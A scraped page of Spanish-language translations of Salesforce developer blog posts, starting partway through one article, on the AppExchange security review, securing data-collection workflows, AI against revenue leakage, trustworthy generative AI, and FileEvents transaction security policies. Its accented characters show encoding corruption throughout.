Salesforce Product Security tambi茅n utiliza Code Analyzer , PMD para VS Code y Checkmarx para revisar el c贸digo fuente del paquete Salesforce. Tambi茅n utilizan la base de datos CVE y el esc谩ner Qualys SSL en la mayor铆a de los env铆os.

Si tiene problemas de seguridad y necesita orientaci贸n t茅cnica, los socios ISV pueden registrarse para obtener horas de oficina gratuitas con nuestros ingenieros de seguridad a trav茅s del Portal de seguridad para socios .

Por 煤ltimo, no podemos recomendar lo suficiente Trailhead en t茅rminos de preparaci贸n para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y tambi茅n acabamos de renovar el m贸dulo Revisi贸n de seguridad de AppExchange , que analiza el proceso de env铆o de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista t茅cnica en Salesforce. Ha estado trabajando con el equipo de revisi贸n de seguridad de AppExchange en Salesforce desde 2017, y su funci贸n actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las 煤ltimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a trav茅s de Slack o RSS.

A帽adir a holgura Suscr铆bete a RSS

Continue reading

C贸mo mantener la seguridad en los flujos de trabajo de recopilaci贸n de datos de Salesforce

C贸mo mantener la seguridad en los flujos de trabajo de recopilaci贸n de datos de Salesforce

脷ltima actualizaci贸n el 18 de agosto de 2023 por Rakesh Gupta

La seguridad de los datos debe ser una de sus principales prioridades si recopila, almacena y administra informaci贸n personal. La protecci贸n de datos es especialmente importante si sus flujos de trabajo de recopilaci贸n de datos de Salesforce se integran con varias herramientas, como un generador de formularios web o un sistema de pago.

Muchas regiones e industrias tienen leyes estrictas de privacidad de datos, que incluyen GDPR, GLBA, HIPAA y otras, que rigen la forma en que las organizaciones manejan los datos. Puede garantizar la seguridad y el cumplimiento de los datos a lo largo de sus flujos de trabajo de recopilaci贸n de datos de Salesforce de varias maneras, incluido el enmascaramiento y el cifrado de datos, el control y los permisos de acceso, y el monitoreo regular.

Comprender la importancia de mantener los datos seguros

Los datos confidenciales son todos los datos que se pueden usar para identificar a una persona o da帽arlos si se pierden o son robados. Los tipos de datos confidenciales incluyen:

  • Informaci贸n de identificaci贸n personal
  • informaci贸n de salud protegida
  • Registros financieros o educativos
  • Datos 茅tnicos, pol铆ticos y biom茅tricos

Mantener la seguridad de los datos personales ayuda a generar confianza con las personas que comparten su informaci贸n personal con usted. Tambi茅n garantiza que su organizaci贸n evite sanciones por incumplimiento de las leyes de privacidad de datos.

Pr谩cticas recomendadas de seguridad al recopilar datos

Su organizaci贸n es responsable de asegurarse de que las herramientas de recopilaci贸n de datos que utiliza tengan implementadas las medidas de seguridad adecuadas. Podr谩 proteger mejor los datos confidenciales desde el momento en que se recopilan, a medida que se mueven a trav茅s de sus flujos de trabajo y cuando se trasladan a Salesforce.

Enmascarar campos sensibles

El enmascaramiento de campo ayuda a garantizar que los datos confidenciales se mantengan confidenciales y no se expongan innecesariamente a usuarios no autorizados.

Cifrar datos

El cifrado de datos ayuda a proteger los datos confidenciales contra el acceso, uso o robo no autorizados, ya sea que estos datos est茅n en reposo o en tr谩nsito.

Limite el acceso a los datos

La implementaci贸n de control de acceso y permisos garantiza que solo los usuarios autorizados puedan acceder o modificar los datos.

Supervisar y auditar flujos de trabajo

La vigilancia constante ayuda a garantizar que los flujos de trabajo de recopilaci贸n de datos mantengan el nivel adecuado de seguridad para mantener seguros los datos confidenciales.

2 formas de mejorar la seguridad en los flujos de trabajo de recopilaci贸n de datos de Salesforce

Un flujo de trabajo de recopilaci贸n de datos de varios pasos tendr谩 diferentes puntos de entrada con posibles riesgos de seguridad, como formularios, correos electr贸nicos y cargas de archivos. Es importante que en cada paso de sus procesos de datos, tenga medidas de seguridad para garantizar que personas no autorizadas no accedan a datos o archivos.

Aseg煤rese tambi茅n de probar continuamente sus flujos de trabajo de recopilaci贸n de datos de Salesforce en busca de vulnerabilidades de seguridad. La detecci贸n temprana de amenazas disminuir谩 la posibilidad de una violaci贸n de datos u otras consecuencias graves.

Implementar reglas de retenci贸n de datos

La creaci贸n de una pol铆tica clara de retenci贸n de datos es fundamental para definir c贸mo su organizaci贸n maneja los datos con fines de cumplimiento. Es importante establecer reglas sobre qu茅 datos deben conservarse y durante cu谩nto tiempo, as铆 como reglas sobre qui茅n tiene acceso y c贸mo deshacerse de los datos correctamente una vez que ya no se necesitan.

Acceso a los datos

Establecer reglas de acceso a datos como parte de su pol铆tica de retenci贸n de datos garantizar谩 que solo los usuarios autorizados en un flujo de trabajo tengan acceso a datos confidenciales. Los controles administrativos tambi茅n pueden incluir el requisito de que los usuarios inicien sesi贸n para ver o modificar las listas de respuestas del flujo de trabajo.

Purga de datos

Dentro de su flujo de trabajo, la configuraci贸n de reglas de depuraci贸n de datos puede garantizar que los datos de respuesta se eliminen de forma permanente una vez que ya no los utilice. Personalice esta configuraci贸n de depuraci贸n de datos, como la frecuencia con la que se completa una depuraci贸n, seg煤n sus requisitos de retenci贸n de datos.

Aproveche las aprobaciones del flujo de trabajo

Establecer pasos de aprobaci贸n dentro de los flujos de trabajo es importante para garantizar la responsabilidad durante el proceso de recopilaci贸n de datos. Los pasos de aprobaci贸n dentro de un flujo de trabajo significan que ning煤n usuario tiene control total sobre los cambios o decisiones de datos, lo que ayuda a mejorar la seguridad y la confidencialidad.

Detecci贸n de errores

Los pasos de aprobaci贸n en un flujo de trabajo proporcionan un proceso de revisi贸n de datos est谩ndar antes de que los datos se acepten o utilicen oficialmente. Esto ayuda a reducir las incoherencias y los errores, as铆 como a garantizar el cumplimiento de las normas de privacidad de datos pertinentes.

Pista de auditor铆a

Los registros de auditor铆a para las aprobaciones de flujos de trabajo simplifican el proceso al registrar cada paso de aprobaci贸n y crear un registro hist贸rico de los cambios realizados en los datos. Tambi茅n se pueden utilizar durante las investigaciones en caso de brechas de seguridad o problemas de datos.

Simplificaci贸n de los flujos de trabajo de recopilaci贸n de datos de Salesforce con FormAssembly

Cuando se trata de proteger los flujos de trabajo de datos, es fundamental contar con pol铆ticas de privacidad y seguridad de datos. Su organizaci贸n puede beneficiarse del uso de una 煤nica plataforma de flujo de trabajo y recopilaci贸n de datos como FormAssembly, que facilita la centralizaci贸n de la protecci贸n contra amenazas y garantiza el cumplimiento. Este enfoque le permite escalar m谩s f谩cilmente, auditar los flujos de datos de forma centralizada y aumentar la eficiencia, al mismo tiempo que maximiza la seguridad en todos sus flujos de trabajo de recopilaci贸n de datos de Salesforce.

La potente plataforma conectada a Salesforce de FormAssembly combina la recopilaci贸n de datos segura y compatible con un generador de procesos visual e inteligente que le permite crear procesos complejos que incluyen formularios, correos electr贸nicos, integraciones y m谩s, todo sin c贸digo.

Descubra c贸mo FormAssembly puede ayudarlo a optimizar sus flujos de trabajo de recopilaci贸n de datos de Salesforce mientras mantiene seguros los datos confidenciales.

馃憠 M谩s informaci贸n sobre el flujo de trabajo de FormAssembly

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

Lucha contra las fugas de ingresos con inteligencia artificial, datos y poder administrativo

Lucha contra las fugas de ingresos con inteligencia artificial, datos y poder administrativo

脷ltima actualizaci贸n el 18 de agosto de 2023 por Rakesh Gupta

La fuga de ingresos es la amenaza oculta a la que se enfrentan todas las empresas. Desde las etapas iniciales de calificaci贸n de clientes potenciales hasta las ventas adicionales y cruzadas, los ingresos potenciales pueden perderse en cualquier punto del embudo de ventas debido a brechas e ineficiencias.

En este art铆culo, exploraremos c贸mo las empresas pueden utilizar la inteligencia artificial (IA) y los datos para combatir la fuga de ingresos junto con la experiencia de los administradores de Salesforce.

En su forma m谩s simple, la fuga de ingresos es la p茅rdida de ingresos ganables debido a errores no forzados y desalineaciones en el proceso de generaci贸n de ingresos. Seg煤n Boston Consulting Group , las d茅biles estrategias de lanzamiento al mercado est谩n causando que las empresas pierdan $2 billones al a帽o en ingresos potenciales perdidos y costos excesivos.  

Profundizaremos en este tema cr铆tico en Dreamforce en San Francisco del 12 al 14 de septiembre de 2023. Como orgulloso patrocinador del evento, Revenue Grid compartir谩 informaci贸n sobre c贸mo las empresas pueden abordar de manera efectiva la fuga de ingresos utilizando el poder de la IA y los datos. . Nuestra misi贸n es simple: capacitar a las empresas para salvaguardar sus ingresos ganados con tanto esfuerzo y, como administrador de Salesforce, 隆usted tiene la clave de esta iniciativa! 脷nase a nosotros en Dreamforce para sumergirse en el emocionante mundo de la protecci贸n de ingresos impulsada por IA y descubra c贸mo abordar este desaf铆o comercial cr铆tico.

Revolucionando la batalla contra las fugas de ingresos con IA

La lucha contra la fuga de ingresos nunca ha sido un trabajo f谩cil. Con el auge de la IA generativa, surge una poderosa herramienta contra las fugas de ingresos, que transforma la forma en que las empresas combaten este desafiante problema. La adopci贸n de IA entre las organizaciones B2B est谩 en constante aumento. La investigaci贸n de McKinsey indica que el 90 % de los l铆deres comerciales prev茅 utilizar con frecuencia soluciones de IA generativa en los pr贸ximos dos a帽os. Adem谩s, las organizaciones que invierten en IA est谩n experimentando aumentos sustanciales en los ingresos, que van del 3 % al 15 %, seg煤n el mismo informe.

La IA es un poderoso aliado en la lucha contra las fugas de ingresos. Sin embargo, no puede hacerlo solo. El punto clave a entender es que la IA aprende de los datos generados por humanos. En t茅rminos m谩s simples, la efectividad de la IA est谩 directamente relacionada con la calidad de sus datos. Para aprovechar al m谩ximo el potencial de la IA y desbloquear sus capacidades para la protecci贸n de los ingresos, es esencial conectar datos fiables y confiables de diversas fuentes.

Sin embargo, en muchas organizaciones, los datos se a铆slan con frecuencia en varios sistemas, creando silos. Incluso las grandes organizaciones con s贸lidos procedimientos de gesti贸n de datos a menudo se encuentran con problemas de calidad de los datos, como la falta de datos en su CRM. Esta realidad nos enfrenta a un c铆rculo vicioso, ya que los datos incorrectos son una de las causas m谩s comunes de fuga de ingresos . Sin garantizar la integridad de los datos y aprovechar la IA, combatir de manera efectiva las fugas de ingresos se convierte en una tarea imposible.

Garantizar la integridad de los datos incluye manejar la seguridad y abordar las preocupaciones de cumplimiento que requieren conocimientos t茅cnicos y experiencia espec铆fica. Con sus conocimientos y habilidades, los administradores de Salesforce desempe帽an un papel vital en cerrar la brecha entre las capacidades de IA y la calidad de los datos, lo que permite a las empresas combatir las fugas de ingresos de manera efectiva.

Garantizar la integridad de los datos con captura de actividad y poder administrativo

Una de las principales razones detr谩s de los problemas de datos para las empresas es la dependencia de los procesos manuales, lo que puede conducir a la entrada de datos que requiere mucho tiempo y mano de obra, lo que resulta en datos faltantes, errores y duplicados en CRM.

La captura de actividad automatizada supera estos desaf铆os al ofrecer una alternativa efectiva a la entrada manual de datos. Al recopilar y guardar el 100 % de los datos de actividad en varios puntos de contacto con el cliente, las soluciones de captura de actividad eliminan los errores de entrada de datos y garantizan datos precisos y siempre actualizados en Salesforce.

Adem谩s, tener datos completos permite a las empresas ver el panorama general, lo que les permite evaluar el estado de la tuber铆a e identificar acuerdos que se est谩n moviendo, estancados o en riesgo, ayud谩ndolos a identificar posibles fugas antes de que ocurran. Adem谩s, la captura de actividad automatizada mejora la eficiencia al liberar a los equipos de ventas de dedicar tiempo a la entrada manual de datos.

Si bien la captura de actividad parece ser la soluci贸n ideal para garantizar la integridad de los datos, no todas las herramientas de captura de actividad se crean de la misma manera y algunas pueden tener serias desventajas. Estos pueden incluir no tener datos reportables en Salesforce, opciones de sincronizaci贸n personalizables limitadas, falta de sincronizaci贸n bidireccional que causa problemas de programaci贸n y vulnerabilidades de seguridad debido a la ausencia de opciones de implementaci贸n en la nube privada y local.

La experiencia y los conocimientos t茅cnicos de los administradores de Salesforce son cruciales para superar con 茅xito estos desaf铆os. Capacitar a los administradores para elegir e implementar la soluci贸n de captura de actividad adecuada y manejar los problemas relacionados con los datos cuando ocurren garantiza el mantenimiento de datos de CRM de alta calidad.

Aprovechar la IA para combatir la fuga de ingresos

Con la integridad de los datos asegurada, el motor de IA ahora se alimenta con informaci贸n esencial y est谩 listo para actuar. Los datos de actividad incluyen se帽ales invaluables sobre la canalizaci贸n, las oportunidades de ventas y las brechas potenciales en los procesos. Identificar estos conocimientos requiere un an谩lisis profundo de los datos, lo que es imposible con la evaluaci贸n manual. AI automatiza el an谩lisis de datos para visualizar el estado de la tuber铆a e identificar las brechas de ejecuci贸n que indican fugas de ingresos.  

A continuaci贸n, la IA crea informaci贸n procesable a trav茅s de la inteligencia de ingresos. Despu茅s de analizar cantidades masivas de datos, la IA detecta patrones y los transforma en informaci贸n procesable a trav茅s de recomendaciones de IA contextuales y en tiempo real. Esto brinda a los equipos la orientaci贸n que necesitan para abordar la posible fuga de ingresos de inmediato.

El paso final es garantizar que se sigan estas recomendaciones y evaluar su eficacia. Las funciones de informes avanzados y las se帽ales de IA muestran el impacto exacto en tiempo real a medida que evoluciona la canalizaci贸n. Esto permite los ajustes necesarios en los procesos y establece una plataforma de ejecuci贸n para implementar cambios en toda la empresa y mejoras en los procesos para combatir las fugas de ingresos en toda la empresa.  

脷nase a nuestras sesiones de oratoria de Dreamforce para obtener m谩s informaci贸n

La fuga de ingresos es un problema comercial cr铆tico que debe manejarse, y la IA surge como una herramienta poderosa para abordarlo. Para aprovechar al m谩ximo el potencial de la IA, es esencial combinarla con datos de calidad. Aqu铆 es donde los administradores de Salesforce juegan un papel fundamental, potenciando la IA con datos valiosos y aprovechando su experiencia y conocimientos t茅cnicos para combatir las fugas de ingresos de manera efectiva.

Si est谩 ansioso por obtener m谩s informaci贸n sobre c贸mo la IA puede revolucionar sus estrategias de protecci贸n de ingresos, lo invitamos a unirse a nuestras sesiones de conferencias de Dreamforce . 隆Encu茅ntrenos en el stand n.潞 1126 para explorar las emocionantes posibilidades de la optimizaci贸n de ingresos impulsada por IA!

Maria Gordienko es directora de comunicaciones de Revenue Grid.

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

5 pasos para la IA generativa confiable para desarrolladores de Salesforce 鈽侊笍

5 pasos para la IA generativa confiable para desarrolladores de Salesforce 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

5 pasos para la IA generativa confiable para desarrolladores de Salesforce | Blog de desarrolladores de Salesforce

La IA generativa se ha convertido en el factor de cambio para las empresas innovadoras y orientadas al cliente. Impulsada por algoritmos avanzados y aprendizaje autom谩tico, la IA generativa puede impulsar la innovaci贸n, optimizar los procesos y acelerar las empresas en todas partes al proporcionar experiencias y soluciones personalizadas adaptadas a las necesidades 煤nicas de los clientes.

Igualmente importante para las experiencias poderosas dirigidas por el cliente es la protecci贸n de los datos cr铆ticos para el negocio. Los sistemas de IA procesan y generan contenido basado en grandes conjuntos de datos y, lamentablemente, los modelos de lenguaje extenso (LLM) no est谩n poniendo su negocio en primer lugar. Mientras se prepara para implementar capacidades de IA generativa, es fundamental priorizar la privacidad de los datos. Al implementar medidas s贸lidas de protecci贸n de datos, no solo mantiene el cumplimiento de las regulaciones pertinentes, sino que tambi茅n mantiene la confianza del cliente, su activo m谩s valioso.

Con los cinco pasos que se describen a continuaci贸n, puede innovar r谩pidamente, aumentar la productividad y mejorar las experiencias personalizadas, al mismo tiempo que garantiza la seguridad y la privacidad de los datos de sus clientes.

Paso 1: comprender y auditar sus datos

Para asegurarse de tener las protecciones de seguridad, privacidad y gobernanza correctas, querr谩 comprender qu茅 datos usar谩 para crear avisos, plantillas y modelos de capacitaci贸n. Comprender los datos a los que permite que accedan los modelos de IA ayudar谩 a evitar que se compartan inadvertidamente los datos personales o confidenciales de los clientes.

Entonces, 驴c贸mo empezar? Primero, anonimice y agregue los datos de los clientes antes de usarlos con fines de IA generativa. Elimine la informaci贸n de identificaci贸n personal (PII) y cualquier otro dato confidencial que pueda identificar a las personas.

Una manera f谩cil de hacer esto en Salesforce es usar Data Detect , un producto que le permite revisar objetos y campos antes de permitir que los procesos de IA accedan a ellos para recibir indicaciones y capacitaci贸n. Una vez que los datos se han escaneado a trav茅s de Data Detect, puede confirmar que no hay sorpresas en esos datos, como n煤meros de tarjetas de cr茅dito o direcciones de correo electr贸nico en campos donde ese tipo de datos no deber铆a existir.

Data Detect tambi茅n puede ayudar a recomendar un nivel de clasificaci贸n, como "Confidencial" o "PII" para datos personales, y proporcionar detalles sobre el contenido de un objeto, as铆 como encontrar datos confidenciales generados por chatbots, casos y transcripciones de llamadas registradas autom谩ticamente. por IA.

Paso 2: configure la protecci贸n de la privacidad de los datos para sus procesos generativos de IA

Respetar la privacidad del cliente y proteger los datos a lo largo de sus procesos de IA es crucial para establecer y mantener la confianza. A medida que conf铆a m谩s en la IA para comprender y tomar decisiones a partir de sus datos, 驴c贸mo protege tambi茅n esos datos, especialmente la PII?

Para los procesos de IA que usan datos personales, como aumentar los registros de contacto u orquestar ofertas de marketing din谩micas 1:1, querr谩 desarrollar pol铆ticas de uso de datos claras y transparentes que describan c贸mo se manejar谩n los datos de los clientes, incluido su uso en sistemas de IA generativos. . Comunique estas pol铆ticas a sus clientes y br铆ndeles la oportunidad de optar por no participar o elegir el nivel adecuado de uso de datos. Adem谩s, cree una pol铆tica para eliminar y ofuscar los datos que ya no son 煤tiles o relevantes, para que sus clientes permanezcan protegidos y sus procesos de IA generativa permanezcan precisos.

Centro de privacidad puede ayudar a verificar que sus procesos de IA est茅n autorizados para su uso en capacitaci贸n y avisos. El Centro de privacidad tambi茅n puede ayudarlo a crear pol铆ticas de retenci贸n para administrar el ciclo de vida de los datos utilizados y generados por la IA, incluidas las transcripciones de llamadas, los chatbots y los casos registrados autom谩ticamente por la IA.

Paso 3: configure su organizaci贸n para administrar la IA generativa

Tanto para proteger los datos utilizados en los procesos de IA como para confirmar que sus integraciones se mantienen dentro de los l铆mites de los datos que desea utilizar, deber谩 implementar controles para proteger los datos de los clientes frente a accesos no autorizados o infracciones.

Los controles de acceso le permiten restringir el acceso a los datos del cliente solo al personal autorizado. Al otorgar acceso seg煤n sea necesario, reduce el riesgo de que los modelos de IA y las personas no autorizadas accedan a datos confidenciales. Esto protege contra el posible uso indebido de esos datos al tiempo que garantiza la privacidad del cliente.

Security Center puede ayudarlo a administrar de manera centralizada los permisos de usuario y las configuraciones de la organizaci贸n para los datos que se usan y se obtienen de los procesos de IA.

Ahora prepar茅monos para implementar la IA de manera segura en toda su organizaci贸n.

Paso 4: pruebe sus procesos para la implementaci贸n

Las pruebas en un entorno de espacio aislado son primordiales cuando se trata de IA generativa. Esto tiene dos prop贸sitos fundamentales: probar los procesos de IA y capacitar a los empleados sobre el uso seguro y responsable de la IA generativa. Al realizar pruebas exhaustivas en un entorno de espacio aislado controlado, las organizaciones pueden evaluar y refinar el rendimiento y el comportamiento de sus modelos generativos de IA antes de implementarlos en escenarios del mundo real. Las pruebas permiten la identificaci贸n y mitigaci贸n de posibles problemas, como sesgos, errores o consecuencias no deseadas que pueden surgir durante un proceso de IA generativa.

Adem谩s, un entorno de sandbox proporciona un espacio seguro para que los empleados adquieran experiencia pr谩ctica y capacitaci贸n en el uso de herramientas y sistemas de IA generativa. Les permite explorar capacidades e identificar consideraciones 茅ticas mientras toman decisiones informadas al usar la tecnolog铆a de manera responsable en sus operaciones diarias. Al aprovechar las pruebas de sandbox, las organizaciones pueden garantizar la confiabilidad, la eficacia y la aplicaci贸n 茅tica de la IA generativa al tiempo que capacitan a su fuerza laboral para adoptar y utilizar esta tecnolog铆a transformadora con confianza.

Aseg煤rese de que, cuando utilice un espacio aislado para el entrenamiento de IA, haya eliminado todos los datos personales para crear sus indicaciones o entrenar un modelo de IA; puede eliminar u ofuscar f谩cilmente cualquier dato que no deba incluirse con Data Mask .

Paso 5: Supervise y proteja sus procesos de IA

Garantizar que la integraci贸n de IA no acceda a los datos ni modifique los sistemas m谩s all谩 del alcance previsto es crucial para mantener la seguridad de los datos y la integridad del sistema. Como describimos anteriormente, los controles de acceso y los permisos de los usuarios deben definirse cuidadosamente, otorgando a los sistemas de IA solo los privilegios necesarios y limitando su acceso a fuentes o sistemas de datos espec铆ficos. Adem谩s, se deben realizar pruebas y validaciones exhaustivas de la integraci贸n de la IA para verificar que funcione seg煤n lo previsto y que no tenga consecuencias ni vulnerabilidades no deseadas.

Finalmente, implementar mecanismos de monitoreo robustos puede ayudar a detectar y alertar cualquier intento de acceso no autorizado o comportamiento anormal por parte del sistema de IA. Las auditor铆as y revisiones peri贸dicas de los procesos de integraci贸n de IA y los registros de acceso pueden ayudar a identificar cualquier desviaci贸n o posibles riesgos de seguridad.

Event Monitoring ayuda a que el proceso de monitoreo y detecci贸n sea m谩s f谩cil al permitir la configuraci贸n de capacidades, como la seguridad de transacciones, para enviar alertas o bloquear acciones m谩s all谩 de lo que se pretend铆a inicialmente para su proceso de IA.

Finalmente, a medida que se adentra m谩s en su viaje de IA, es fundamental que sus datos est茅n respaldados y puedan restaurarse hasta el nivel de registro en el caso poco probable de que los datos utilizados y aumentados por IA est茅n mal configurados o sincronizados incorrectamente. Haga una copia de seguridad de sus datos para ver cada versi贸n de los registros utilizados y tocados por AI, y restaure cualquier error.

Conclusi贸n

Al adoptar un enfoque que prioriza la privacidad e implementar medidas s贸lidas de protecci贸n de datos, puede crear una base confiable para pr谩cticas de IA generativas responsables, sostenibles y 茅ticas, todo mientras impulsa una innovaci贸n m谩s eficiente y efectiva e interacciones m谩s personalizadas con los clientes. Para obtener m谩s informaci贸n sobre c贸mo comenzar con la IA generativa, consulte nuestra Gu铆a de introducci贸n a la IA.

Recursos

Sobre el Autor

Marla Hay Vicepresidenta de Seguridad, Privacidad y Gesti贸n de Datos en Salesforce y dirige la organizaci贸n de productos de Servicios de confianza. Se uni贸 a Salesforce en 2017 despu茅s de liderar productos en una empresa de gesti贸n de identidad de consumidores. Marla tiene una licenciatura en Ciencias de la Computaci贸n de la Universidad de Cornell y una maestr铆a en Ciencias de la Computaci贸n de la Universidad Johns Hopkins.

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Uso de FileEvents para fortalecer la seguridad de los archivos 鈽侊笍

Uso de FileEvents para fortalecer la seguridad de los archivos 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Uso de FileEvents para fortalecer la seguridad de los archivos | Blog de desarrolladores de Salesforce

Siempre que un usuario de Salesforce intente cargar, obtener una vista previa o descargar un archivo a trav茅s de la interfaz de usuario o la API, se producir谩 un FileEvent en el backend. Este evento est谩 incluido en la funci贸n Supervisi贸n de eventos en tiempo real de Salesforce, y los desarrolladores de Salesforce pueden optar por habilitar la transmisi贸n o el almacenamiento para FileEvents como cualquier otro evento asociado con la Supervisi贸n de eventos en tiempo real. Adem谩s, los desarrolladores pueden configurar una pol铆tica de seguridad de transacciones para FileEvents, lo que les permite realizar un seguimiento y tomar medidas en funci贸n de las acciones del usuario en los archivos.

Estamos emocionados de ver que FileEvents se convierte en GA en el lanzamiento de Summer '23 . En esta publicaci贸n, le mostraremos c贸mo puede crear una pol铆tica de seguridad de transacciones sobre un FileEvent y fortalecer la seguridad de los archivos.

Nota: FileEvents est谩 disponible para los clientes que compraron suscripciones complementarias de Salesforce Shield o Salesforce Event Monitoring.

驴Por qu茅 es importante la seguridad de archivos de Salesforce?

Para comprender FileEvents, es importante comprender primero la importancia de la seguridad de archivos en la organizaci贸n de Salesforce. Salesforce almacena una amplia gama de informaci贸n como archivos, incluidos los datos de contacto del cliente, los datos de ventas, las notas de las interacciones con los clientes y las solicitudes de servicio, as铆 como documentos internos como contratos, materiales de marketing y especificaciones de productos. Adem谩s, el sistema puede almacenar archivos relacionados con transacciones financieras como facturas u 贸rdenes de compra.

El prop贸sito de Salesforce Files es mantener todos estos datos en una ubicaci贸n central, para que varios usuarios puedan acceder a ellos f谩cilmente a la vez, mejorando as铆 la colaboraci贸n y la productividad. Es fundamental priorizar la protecci贸n de estos archivos para garantizar la seguridad de la informaci贸n confidencial en su organizaci贸n de Salesforce. Esto no puede ser enfatizado suficientemente.

驴Qu茅 puede hacer FileEvents?

Cuando los empleados renuncian a su trabajo, normalmente contin煤an trabajando durante un breve per铆odo de tiempo antes de abandonar la empresa. En esta situaci贸n, muchas empresas restringen el acceso a archivos confidenciales durante este per铆odo previo a la salida. Se puede implementar una pol铆tica de seguridad de transacciones utilizando FileEvents para evitar que los empleados descarguen archivos etiquetados como "legales" con fines de cumplimiento.

Suposici贸n

  • Su organizaci贸n tiene una licencia complementaria de Salesforce Shield o Event Monitoring
  • Los archivos que los usuarios intentan descargar tienen una etiqueta legal

Veamos c贸mo puede implementar una pol铆tica de seguridad de transacciones utilizando eventos de archivo.

  • Configuraci贸n 鈫 Pol铆ticas de seguridad de transacciones
  • Haga clic en Nuevo y seleccione Apex

En el men煤 desplegable "Evento", seleccione FileEvent . Y en el men煤 desplegable Clase de Apex, seleccione Nueva clase de Apex vac铆a y luego haga clic en el bot贸n Siguiente .

En la selecci贸n Acciones , podemos elegir Mensaje predeterminado o Mensaje de bloqueo personalizado. Lo mismo se aplica al contenido de las notificaciones por correo electr贸nico. Aseg煤rese de que el estado de la pol铆tica est茅 habilitado.

Ahora, la clase est谩ndar de Apex se ha creado autom谩ticamente.

El fragmento de c贸digo siguiente incluye l贸gica para satisfacer las necesidades de cumplimiento. Actualice la clase con este fragmento de c贸digo.

隆Gran trabajo! Ve谩moslo todo en acci贸n

Inicie sesi贸n como usuario e intente descargar el archivo que est谩 etiquetado como "Legal".

La capacidad de descargar los archivos se ha restringido debido a la pol铆tica que creamos.

Conclusi贸n

Ahora que FileEvents est谩 disponible en general, es m谩s f谩cil que nunca configurar pol铆ticas de seguridad de transacciones para administrar archivos. Al aprovechar estos eventos, puede monitorear y responder a la actividad en tiempo real, detectar comportamientos sospechosos r谩pidamente e identificar con precisi贸n amenazas potenciales antes de que se conviertan en un problema.

Adem谩s, aprovechar las capacidades de automatizaci贸n, como alertas o notificaciones autom谩ticas cuando ocurren ciertas actividades en archivos dentro de su organizaci贸n, ayudar谩 a garantizar que cualquier actividad maliciosa se identifique de inmediato para que se puedan tomar las contramedidas adecuadas de inmediato.

Est谩 claro por qu茅 mantener seguros los documentos confidenciales dentro de un sistema de archivo seguro debe ser una prioridad para cualquier empresa que utilice una plataforma de CRM como Salesforce. En conclusi贸n, comprender FileEvents es esencial para mejorar la seguridad de su organizaci贸n de Salesforce.

Sobre el Autor

Jagan Padmanabhan es Arquitecto T茅cnico (Grupo de 脡xito del Cliente) en Salesforce con un enfoque especial en la creaci贸n de aplicaciones seguras a gran escala. Le apasiona desarrollar aplicaciones utilizando productos basados en la seguridad como Salesforce Shield y Event Monitoring. Adem谩s, contribuye activamente a la seguridad de la plataforma como investigador de seguridad. S铆guelo en LinkedIn .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading